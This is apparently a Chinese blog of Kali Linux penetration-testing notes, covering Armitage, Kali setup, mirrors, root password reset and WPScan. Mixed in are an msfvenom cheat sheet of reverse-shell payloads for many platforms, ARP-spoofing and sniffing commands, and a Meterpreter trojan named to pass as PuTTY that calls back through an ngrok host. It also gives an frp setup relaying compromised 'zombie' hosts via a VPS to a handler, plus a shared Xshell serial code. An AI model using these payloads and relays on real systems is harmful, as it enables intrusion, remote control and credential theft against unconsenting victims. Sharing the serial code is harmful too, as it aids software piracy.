渗透工具-白帽安全工程师Kali linux系统

渗透工具-白帽安全工程师Kali linux

  • 2022 安装 Armitage 傻瓜渗透msf
    • 介绍
    • 官网下载
    • build安装
    • 配置数据库
  • Kali linux 介绍安装及入门
        • 前身 BackTrack(BT) <--- ubuntu
        • kali <--- Debian linux 发行版
    • KaliLinux 渗透测试 艺术
      • U盘安装
    • 可以U盘启动
            • (如果虚拟机 稍后引导iso文件 且 移除暂时不用的组件)
            • 网速够快 NET适配 软件更新源(不建议)
            • 网速不行Vmnet1 (仅主机模式)
          • Ctrl+Alt+insert (重启系统)
        • 分区
          • (建议)使用整个磁盘 将所有文件放在同一个分区
        • 安装虚拟工具
        • 记录init 快照
        • 资源连接
    • 在这里插入图片描述
  • tools install
      • 更新
  • 易锦大学 热身 20211007 by:aming
    • CLAY 的 故事
    • 黑猫
    • 白猫
    • 红客
    • 网络安全法
  • 渗透测试 套路
  • 第二章--第1节--kali linux搭建
    • Kali Linux 2020.1修改root用户密码
    • 锁屏
    • msfvenom常用生成payload命令
    • Meterpreter持久控制服务器
    • Kali实战--HTTPS账户密码获取
    • ***HTTPS账户密码获取***
    • 实验环境:
    • SSH 连接
    • Wordpress渗透之Wpscan工具
    • C:\WINDOWS\system32\drivers\etc ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421180058785.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421180123664.png)
    • 0708 centos matesploit 搭建
  • 通过ngrok穿透反弹shell
    • 0.0注册ngrok 内网穿透平台账号,开通免费隧道
    • 0x01 下载安装穿透client客户端
    • 0x02 Msfvenom 木&马生成
    • 0x03 启动msf 配置Exploit模块
    • 0x04 选择攻击载荷上线
  • Frp将外网meterpreter转发至本地msf

2022 安装 Armitage 傻瓜渗透msf

msf是一个很好的渗透测试框架,但是苦于众多的指令,
因此出现一款软件可以将其图形化显示,这就是大名鼎鼎的armitage。

介绍

Armitage是一款Java写的Metasploit图形界面化的渗透软件,
可以用它结合Metasploit中已知的exploit来针对内网主机存在的漏洞自动化渗透,
由于作者已经不再更新版本,目前在kali linux 中是默认不安装的。

官网下载

kali tools地址:https://www.kali.org/tools/armitage/

下载地址:https://gitlab.com/kalilinux/packages/armitage

渗透工具-白帽安全工程师Kali linux系统_第1张图片
渗透工具-白帽安全工程师Kali linux系统_第2张图片渗透工具-白帽安全工程师Kali linux系统_第3张图片
渗透工具-白帽安全工程师Kali linux系统_第4张图片

build安装

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master]
└─$ ./package.sh

渗透工具-白帽安全工程师Kali linux系统_第5张图片

结束后在release里面有unix和windows两个文件夹。
渗透工具-白帽安全工程师Kali linux系统_第6张图片
渗透工具-白帽安全工程师Kali linux系统_第7张图片

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ ./armitage

就可以运行了,但是这时候运行会出现问题,还需要配置数据库。

配置数据库

数据的默认地址是:
/etc/postgresql/
后面是版本号:14/main/

渗透工具-白帽安全工程师Kali linux系统_第8张图片
全部注释掉,然后加上:

# "local" is for Unix domain socket connections only
local   all             all                           trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

然后执行下面代码:

 ┌──(kali㉿kali)-[~]
└─$ sudo service postgresql stop

┌──(kali㉿kali)-[~]
└─$ sudo msfdb  reinit 

┌──(kali㉿kali)-[~]
└─$ sudo service postgresql start

┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ sudo ./armitage

渗透工具-白帽安全工程师Kali linux系统_第9张图片
渗透工具-白帽安全工程师Kali linux系统_第10张图片

渗透工具-白帽安全工程师Kali linux系统_第11张图片渗透工具-白帽安全工程师Kali linux系统_第12张图片

Kali linux 介绍安装及入门

前身 BackTrack(BT) <— ubuntu

kali <— Debian linux 发行版

功能: 数字取证 渗透测试 黑客攻防 安全系统 支持ARM架构
开发团队:Offensive Security Devon Kearns

KaliLinux 渗透测试 艺术

渗透工具-白帽安全工程师Kali linux系统_第13张图片

渗透工具-白帽安全工程师Kali linux系统_第14张图片渗透工具-白帽安全工程师Kali linux系统_第15张图片渗透工具-白帽安全工程师Kali linux系统_第16张图片渗透工具-白帽安全工程师Kali linux系统_第17张图片
预装软件:
nmap (端口扫描)
Wireshark(数据包分析)
John the Ripper (密码破解)
Aircrack-ng(无线局域网测试套装)
Metasploit Framework(针对远程主机开发/执行Exploit codeing Tools)

运行:
硬盘启动 liveCD liveUSB

U盘安装

建议下载 win32 Disk Imager
写入镜像 --> u盘

可以U盘启动

32/64 可能是AMD架构
在这里插入图片描述 自己区分 有人说32-i386位的好用 ,自己测试
512MB以上
20GB以上

(如果虚拟机 稍后引导iso文件 且 移除暂时不用的组件)
网速够快 NET适配 软件更新源(不建议)
网速不行Vmnet1 (仅主机模式)
Ctrl+Alt+insert (重启系统)

渗透工具-白帽安全工程师Kali linux系统_第18张图片
渗透工具-白帽安全工程师Kali linux系统_第19张图片
渗透工具-白帽安全工程师Kali linux系统_第20张图片
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第21张图片
渗透工具-白帽安全工程师Kali linux系统_第22张图片
渗透工具-白帽安全工程师Kali linux系统_第23张图片
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第24张图片
渗透工具-白帽安全工程师Kali linux系统_第25张图片
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第26张图片
渗透工具-白帽安全工程师Kali linux系统_第27张图片
渗透工具-白帽安全工程师Kali linux系统_第28张图片
渗透工具-白帽安全工程师Kali linux系统_第29张图片

引导顺序 硬盘 光盘 u盘(有系统物理机 更改引导顺序eg:F12)
开机启动中时候
F12 /Esc
渗透工具-白帽安全工程师Kali linux系统_第30张图片

渗透工具-白帽安全工程师Kali linux系统_第31张图片
install
自己选择语言
帐号密码

分区

LVM Logical Volume Manager(逻辑卷管理)
Linux环境下对磁盘分区进行管理的一种机制

(建议)使用整个磁盘 将所有文件放在同一个分区

写入磁盘
渗透工具-白帽安全工程师Kali linux系统_第32张图片
不使用网络镜像
GRUB 引导启动 /dev/sda
(密码忘了的话 --> 去看看linux 密码破解攻防系列)

安装虚拟工具

umount / dev / sr0 卸载光盘
clear
mount /dev /sr0 /media 挂载
ls /media
cd /media
tar zxvf xxx.tar.gz -C /xxx/xxx
cd /xxx/xxx
ls
./vmware-install.pl
默认回车
渗透工具-白帽安全工程师Kali linux系统_第33张图片
死循环 填写no
安装完毕
sync 保存当前配置
reboot 重启

记录init 快照

渗透工具-白帽安全工程师Kali linux系统_第34张图片

###  查看预装软件   

渗透工具-白帽安全工程师Kali linux系统_第35张图片
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第36张图片

完毕简单测试下

强行更改ip
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第37张图片
:wq


https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2021.1/

资源连接

kali下载连接:https://www.kali.org/downloads/
渗透工具-白帽安全工程师Kali linux系统_第38张图片

渗透工具-白帽安全工程师Kali linux系统_第39张图片

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
 
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
  
#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
  

#阿里巴巴
deb http://http.kali.org/kali kali-rolling main non-free contrib
 
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

渗透工具-白帽安全工程师Kali linux系统_第40张图片

apt-get update //获取最新软件包的列表


apt-get dist-upgrade 将根据需要安装或删除软件包以完成升级,
apt-get upgrade 将自动安装但不会删除包。
apt --fix-broken install

安装fcitx
apt-get install fcitx

 apt-get install fcitx fcitx.googlepinyin

三、下载搜狗输入法

   https://pinyin.sogou.com/linux/

渗透工具-白帽安全工程师Kali linux系统_第41张图片

 sudo dpkg -i sogoupinyin_版本号_amd64.deb
注:
如果安装过程中提示缺少相关依赖,则执行如下命令解决:
sudo apt -f install

apt-getinstallibus ibus-pinyin
渗透工具-白帽安全工程师Kali linux系统_第42张图片

渗透工具-白帽安全工程师Kali linux系统_第43张图片
2020 版本 非root用户 使用标准的非特权用户来增加额外的安全性
】- kali kali

渗透工具-白帽安全工程师Kali linux系统_第44张图片

需要root访问的工具,以及诸如启动/停止服务等常见的管理功能,将以交互方式请求管理权限(至少在从Kali菜单启动时)

我们不再为每个桌面环境(DE)提供单独的映像。
相反,我们现在有一个单独的映像,可以选择在安装期间选择DE。
这意味着没有Xfce(这是我们从2019.4开始的默认选项)、GNOME、KDE、MATE或LXDE桌面的下载链接


渗透工具-白帽安全工程师Kali linux系统_第45张图片渗透工具-白帽安全工程师Kali linux系统_第46张图片渗透工具-白帽安全工程师Kali linux系统_第47张图片渗透工具-白帽安全工程师Kali linux系统_第48张图片渗透工具-白帽安全工程师Kali linux系统_第49张图片渗透工具-白帽安全工程师Kali linux系统_第50张图片渗透工具-白帽安全工程师Kali linux系统_第51张图片渗透工具-白帽安全工程师Kali linux系统_第52张图片渗透工具-白帽安全工程师Kali linux系统_第53张图片渗透工具-白帽安全工程师Kali linux系统_第54张图片渗透工具-白帽安全工程师Kali linux系统_第55张图片渗透工具-白帽安全工程师Kali linux系统_第56张图片渗透工具-白帽安全工程师Kali linux系统_第57张图片渗透工具-白帽安全工程师Kali linux系统_第58张图片渗透工具-白帽安全工程师Kali linux系统_第59张图片渗透工具-白帽安全工程师Kali linux系统_第60张图片渗透工具-白帽安全工程师Kali linux系统_第61张图片渗透工具-白帽安全工程师Kali linux系统_第62张图片渗透工具-白帽安全工程师Kali linux系统_第63张图片渗透工具-白帽安全工程师Kali linux系统_第64张图片渗透工具-白帽安全工程师Kali linux系统_第65张图片渗透工具-白帽安全工程师Kali linux系统_第66张图片渗透工具-白帽安全工程师Kali linux系统_第67张图片



tools install

渗透工具-白帽安全工程师Kali linux系统_第68张图片渗透工具-白帽安全工程师Kali linux系统_第69张图片
cd /media/cdrom0/ 双击打开

渗透工具-白帽安全工程师Kali linux系统_第70张图片

cd 
ls
sudo tar zxvf  VM+TAB补全 -C /root

渗透工具-白帽安全工程师Kali linux系统_第71张图片渗透工具-白帽安全工程师Kali linux系统_第72张图片

渗透工具-白帽安全工程师Kali linux系统_第73张图片
在这里插入图片描述


更新

渗透工具-白帽安全工程师Kali linux系统_第74张图片
渗透工具-白帽安全工程师Kali linux系统_第75张图片
渗透工具-白帽安全工程师Kali linux系统_第76张图片渗透工具-白帽安全工程师Kali linux系统_第77张图片

  • 更新之前 先要 换源
    渗透工具-白帽安全工程师Kali linux系统_第78张图片
#中科大
 
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib


#阿里云
 
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
 
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学
 
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
 
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#浙大
 
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
 
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

#东软大学
 
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
 
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

#官方源
 
deb http://http.kali.org/kali kali-rolling main non-free contrib
 
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

渗透工具-白帽安全工程师Kali linux系统_第79张图片
渗透工具-白帽安全工程师Kali linux系统_第80张图片
渗透工具-白帽安全工程师Kali linux系统_第81张图片

  • 我是全选了 源

    apt-get update && apt-get upgrade && apt-get clean

渗透工具-白帽安全工程师Kali linux系统_第82张图片渗透工具-白帽安全工程师Kali linux系统_第83张图片渗透工具-白帽安全工程师Kali linux系统_第84张图片

渗透工具-白帽安全工程师Kali linux系统_第85张图片

渗透工具-白帽安全工程师Kali linux系统_第86张图片
渗透工具-白帽安全工程师Kali linux系统_第87张图片
渗透工具-白帽安全工程师Kali linux系统_第88张图片
渗透工具-白帽安全工程师Kali linux系统_第89张图片渗透工具-白帽安全工程师Kali linux系统_第90张图片

渗透工具-白帽安全工程师Kali linux系统_第91张图片
渗透工具-白帽安全工程师Kali linux系统_第92张图片
渗透工具-白帽安全工程师Kali linux系统_第93张图片
渗透工具-白帽安全工程师Kali linux系统_第94张图片
渗透工具-白帽安全工程师Kali linux系统_第95张图片
渗透工具-白帽安全工程师Kali linux系统_第96张图片
渗透工具-白帽安全工程师Kali linux系统_第97张图片
渗透工具-白帽安全工程师Kali linux系统_第98张图片
渗透工具-白帽安全工程师Kali linux系统_第99张图片
渗透工具-白帽安全工程师Kali linux系统_第100张图片
渗透工具-白帽安全工程师Kali linux系统_第101张图片
渗透工具-白帽安全工程师Kali linux系统_第102张图片
渗透工具-白帽安全工程师Kali linux系统_第103张图片
渗透工具-白帽安全工程师Kali linux系统_第104张图片
渗透工具-白帽安全工程师Kali linux系统_第105张图片
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第106张图片
渗透工具-白帽安全工程师Kali linux系统_第107张图片
渗透工具-白帽安全工程师Kali linux系统_第108张图片
渗透工具-白帽安全工程师Kali linux系统_第109张图片
渗透工具-白帽安全工程师Kali linux系统_第110张图片
渗透工具-白帽安全工程师Kali linux系统_第111张图片
渗透工具-白帽安全工程师Kali linux系统_第112张图片
渗透工具-白帽安全工程师Kali linux系统_第113张图片
渗透工具-白帽安全工程师Kali linux系统_第114张图片
渗透工具-白帽安全工程师Kali linux系统_第115张图片
渗透工具-白帽安全工程师Kali linux系统_第116张图片
渗透工具-白帽安全工程师Kali linux系统_第117张图片

易锦大学 热身 20211007 by:aming

渗透工具-白帽安全工程师Kali linux系统_第118张图片
渗透工具-白帽安全工程师Kali linux系统_第119张图片
渗透工具-白帽安全工程师Kali linux系统_第120张图片

CLAY 的 故事

渗透工具-白帽安全工程师Kali linux系统_第121张图片
渗透工具-白帽安全工程师Kali linux系统_第122张图片

黑猫

渗透工具-白帽安全工程师Kali linux系统_第123张图片

白猫

渗透工具-白帽安全工程师Kali linux系统_第124张图片

红客

渗透工具-白帽安全工程师Kali linux系统_第125张图片

网络安全法

渗透工具-白帽安全工程师Kali linux系统_第126张图片
渗透工具-白帽安全工程师Kali linux系统_第127张图片

渗透测试 套路

渗透工具-白帽安全工程师Kali linux系统_第128张图片
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第129张图片
渗透工具-白帽安全工程师Kali linux系统_第130张图片
渗透工具-白帽安全工程师Kali linux系统_第131张图片
渗透工具-白帽安全工程师Kali linux系统_第132张图片
渗透工具-白帽安全工程师Kali linux系统_第133张图片
渗透工具-白帽安全工程师Kali linux系统_第134张图片
渗透工具-白帽安全工程师Kali linux系统_第135张图片
渗透工具-白帽安全工程师Kali linux系统_第136张图片
渗透工具-白帽安全工程师Kali linux系统_第137张图片
渗透工具-白帽安全工程师Kali linux系统_第138张图片
渗透工具-白帽安全工程师Kali linux系统_第139张图片
渗透工具-白帽安全工程师Kali linux系统_第140张图片

第二章–第1节–kali linux搭建

Kali Linux 2020.1修改root用户密码

安装Kali Linux 2020.1系统后,需要使用root用户权限安装软件。
由于root用户的默认密码未知,所以需要在单用户模式下重新设置root用户密码。
操作步骤如下:

(1)启动Kali Linux,进入启动界面。
(2)选择Kali GNU/Linux项,并按下e键,进入Grub编辑界面。
渗透工具-白帽安全工程师Kali linux系统_第141张图片

(3)选择linux那一行,将ro 改为 rw 在此行末尾增加 init=/bin/bash 修改完毕以后按Ctrl+X 键进入单用户模式
渗透工具-白帽安全工程师Kali linux系统_第142张图片
(4)按下Ctrl+X或F10重新启动系统,即可进入单用户模式。。
渗透工具-白帽安全工程师Kali linux系统_第143张图片
(5)执行passwd命令,输入两次密码。注意,输入的密码是不显示的。
渗透工具-白帽安全工程师Kali linux系统_第144张图片

vim/cat   /etc/shadow

渗透工具-白帽安全工程师Kali linux系统_第145张图片
(6)重启Kali 到此登陆页面,输入刚才设置的账号密码,回车进行登陆,至此已经使用root账号登陆成功
在这里插入图片描述

— 上面错误 直接关闭虚拟机 再打开就重启

渗透工具-白帽安全工程师Kali linux系统_第146张图片

锁屏

渗透工具-白帽安全工程师Kali linux系统_第147张图片
渗透工具-白帽安全工程师Kali linux系统_第148张图片

渗透工具-白帽安全工程师Kali linux系统_第149张图片

msfvenom常用生成payload命令

渗透工具-白帽安全工程师Kali linux系统_第150张图片
渗透工具-白帽安全工程师Kali linux系统_第151张图片

windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 3 -f exe -o
payload.exe
mac:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho
android:
//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk
powershell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf
php:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=
-f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >>
shell.php
aspx:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
jsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp
war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -
o payload.war
nodejs:
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.js
python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -
f raw -o payload.py
perl:
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.pl
ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.rb
lua:
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.lua
windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f c
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f c
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f c

Meterpreter持久控制服务器

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Kali实战–HTTPS账户密码获取

HTTPS账户密码获取

HTTPS(全称:Hyper Text Transfer Protocol over SecureSocket Layer)
以安全为目标的 HTTP 通道
在HTTP的基础上通过传输加密和身份认证保证了传输过程的安全性
HTTPS 在HTTP 的基础下加入SSL 层,
HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。
HTTPS 存在不同于 HTTP 的默认端口及一个加密/身份验证层(在 HTTP与 TCP 之间)。
这个系统提供了身份验证与加密通讯方法。
现在它被广泛用于万维网上安全敏感的通讯,例如交易支付等方面

实验环境:

在这里插入图片描述

SSH 连接

Ctrl+Alt+F1命令行界面登陆运行 或者 init 3(有的童鞋虚拟机)
init+数字所代表的命令:
0:停机或者关机(千万不能将initdefault设置为0)
1:单用户模式,只root用户进行维护
2:多用户模式,不能使用NFS(Net File System)
3:完全多用户模式(标准的运行级别)
4:安全模式
5:图形化(即图形界面)
6:重启(千万不要把initdefault设置为6)

注意命令模式开机可能 numlock是锁着的 打开小写键盘 (密码可能带有数字)
在这里插入图片描述
在这里插入图片描述
logout ###让用户退出系统的Linux命令。

渗透工具-白帽安全工程师Kali linux系统_第152张图片
在这里插入图片描述
###出了点小插曲
在这里插入图片描述
ssh连接 如果出现了 access denied
在这里插入图片描述
在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第153张图片
在这里插入图片描述
###还有一个故障 就是 init转换后图形化登陆循环
在网上找找有相应教程这里就不说了

##弄一个 xshell 得资源 需要的自取
690313-111999-999313 码
链接:https://share.weiyun.com/505zSO7 密码:rnawkn

Xshell 连上了在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第154张图片
之前用的 putty suite Xshell比putty功能强大
所以果断换 eg:复制SSH渠道
或者 Xshell:> ls 显示连接主机用户
或者 便捷命令渗透工具-白帽安全工程师Kali linux系统_第155张图片
arpspoof命令进行断网攻击(ARP欺骗)
arpspoof -i eth0 -t 192.168.1.112 192.168.1.1
与网络有关的-i(interface)
网卡eth0
目标-t(target)
目标IP:192.168.1.112
目标主机网关192.168.1.1

ettercap -i eth0 -Tq
driftnet -i eth0 -b -a -d /pic

解释下这几个参数
-i 监听网卡
-b 声音提醒
-a 保存图片(图片不会显示)
-d 图片保存目录
渗透工具-白帽安全工程师Kali linux系统_第156张图片
渗透工具-白帽安全工程师Kali linux系统_第157张图片
渗透工具-白帽安全工程师Kali linux系统_第158张图片
渗透工具-白帽安全工程师Kali linux系统_第159张图片
sslstrip

Wordpress渗透之Wpscan工具

一、什么是Wpscan?什么是Wordpres?

1.Wpscan

 WPScan是一款针对wordpress的安全扫描软件;
 可以扫描出wordpress的版本,
 主题,插件,后台用户以及爆破后台用户密码等。

2.Wordpress

 WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,
 用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。
 也可以把 WordPress当作一个内容管理系统(CMS)来使用。
 WordPress有许多第三方开发的免费模板,安装方式简单易用。
 如果要做一个自己的模板,则需要有一定的专业知识,
 至少要懂的标准通用标记语言下的一个应用HTML代码、CSS、PHP等相关知识。

建站流程

  1. 注册域名
  2. 申请虚拟主机(国内主机:速度快,较贵,而空间较小;国外主机:便宜,速度慢,空间一般无限制)
  3. 在虚拟主机上绑定自己的域名
  4. 下载WordPress程序
  5. 修改域名的DNS解析
  6. 创建WordPress数据库
  7. 修改WordPress的安装配置文件
  8. 上传WordPress程序至ixwebhosting主机域名空间(ftp上传)
  9. 访问域名/wp-admin/install.php进行wordpress安装。填写博客信息及邮箱

二、Wpscan命令详解

  利用-h命令,可查看Wpscan的常用选项,功能介绍,例子等; 

root@kali:~# wpscan -h


    __          _______   _____                    
    \ \        / /  __ \ / ____|                   
     \ \  /\  / /| |__) | (___   ___  __ _ _ __    
      \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \   
       \  /\  /  | |     ____) | (__| (_| | | | |  
        \/  \/   |_|    |_____/ \___|\__,_|_| |_|  


    WordPress Security Scanner by the WPScan Team   
                   Version 2.8  
      Sponsored by Sucuri - https://sucuri.net   

渗透工具-白帽安全工程师Kali linux系统_第160张图片渗透工具-白帽安全工程师Kali linux系统_第161张图片渗透工具-白帽安全工程师Kali linux系统_第162张图片

 https://data.wpscan.org/plugins.json
https://data.wpscan.org/plugins.json.sha512
https://data.wpscan.org/themes.json
https://data.wpscan.org/themes.json.sha512
https://data.wpscan.org/wordpresses.json
https://data.wpscan.org/wordpresses.json.sha512
https://data.wpscan.org/timthumbs-v3.txt
https://data.wpscan.org/timthumbs-v3.txt.sha512
https://data.wpscan.org/config_backups.txt
https://data.wpscan.org/config_backups.txt.sha512
https://data.wpscan.org/db_exports.txt
https://data.wpscan.org/db_exports.txt.sha512
https://data.wpscan.org/dynamic_finders.yml
https://data.wpscan.org/dynamic_finders.yml.sha512
https://data.wpscan.org/wp_fingerprints.json
https://data.wpscan.org/wp_fingerprints.json.sha512
https://data.wpscan.org/LICENSE
https://data.wpscan.org/LICENSE.sha512
————————————————

渗透工具-白帽安全工程师Kali linux系统_第163张图片在这里插入图片描述渗透工具-白帽安全工程师Kali linux系统_第164张图片

C:\WINDOWS\system32\drivers\etc
在这里插入图片描述在这里插入图片描述

渗透工具-白帽安全工程师Kali linux系统_第165张图片渗透工具-白帽安全工程师Kali linux系统_第166张图片在这里插入图片描述在这里插入图片描述渗透工具-白帽安全工程师Kali linux系统_第167张图片渗透工具-白帽安全工程师Kali linux系统_第168张图片渗透工具-白帽安全工程师Kali linux系统_第169张图片
渗透工具-白帽安全工程师Kali linux系统_第170张图片


渗透工具-白帽安全工程师Kali linux系统_第171张图片
渗透工具-白帽安全工程师Kali linux系统_第172张图片

0708 centos matesploit 搭建

 yum groupinstall 'Development Tools'
 yum -y install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget
yum -y install ruby
yum -y install yaml
yum -y install postgresql

通过ngrok穿透反弹shell

0.0注册ngrok 内网穿透平台账号,开通免费隧道

网址:https://www.ngrok.cc

渗透工具-白帽安全工程师Kali linux系统_第173张图片
eg: 192.168.254.128 我的内网ip

渗透工具-白帽安全工程师Kali linux系统_第174张图片
渗透工具-白帽安全工程师Kali linux系统_第175张图片

0x01 下载安装穿透client客户端

地址:https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

渗透工具-白帽安全工程师Kali linux系统_第176张图片

unzip
   ./sunny  clientid 隧道id  

在这里插入图片描述
渗透工具-白帽安全工程师Kali linux系统_第177张图片

0x02 Msfvenom 木&马生成

kali命令 生成EXE木马文件:

 msfvenom  -p windows/meterpreter/reverse_tcp LHOST=tcp://free.idcfengye.com LPORT=10206 -f exe -o /home/amingmm/Desktop/puty.exe

渗透工具-白帽安全工程师Kali linux系统_第178张图片

0x03 启动msf 配置Exploit模块

 Use exploit/multi/handler

0x04 选择攻击载荷上线

  set payload windows/meterpreter/reverse_tcp

渗透工具-白帽安全工程师Kali linux系统_第179张图片

 set
run/exploit

渗透工具-白帽安全工程师Kali linux系统_第180张图片

Frp将外网meterpreter转发至本地msf

https://github.com/fatedier/frp/releases【下载】
渗透工具-白帽安全工程师Kali linux系统_第181张图片
解压
● kali端 frpc配置

 [common]
server_addr = 121.5.64.200   #vps地址
server_port = 2580			#vps监听端口

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580		# msf载荷 监听端口 【即内网主机监听端口】
remote_port = 6666		# vps流量转发端口【流量出口 载荷端口】 

服务端

 [common]
bind_port = 2580  【服务端监听端口】
 ./frps(frpc) -c frps.ini (frpc.ini)  开启服务端(客户端)

systemctl start frps
systemctl restart frps
systemctl stop frps

● frp 连接流程
frps开启两个端口监听----< 内网客户端frpc 开启 tcp连接到 vps
vps–内网主机建立连接 连接1 建立

● 肉鸡上线 流程
载荷创建进程 主动连接 vps:载荷端口
管道流量转发 把 载荷端口 流量 通过tcp 连接 发包 传送到 内网kali端

● kali端 上线流程
kali端 frpc客户端 通过管道 将流量 转发给 msf handler -->监听端口

渗透工具-白帽安全工程师Kali linux系统_第182张图片

渗透工具-白帽安全工程师Kali linux系统_第183张图片

你可能感兴趣的:(渗透测试,linux,安全,运维)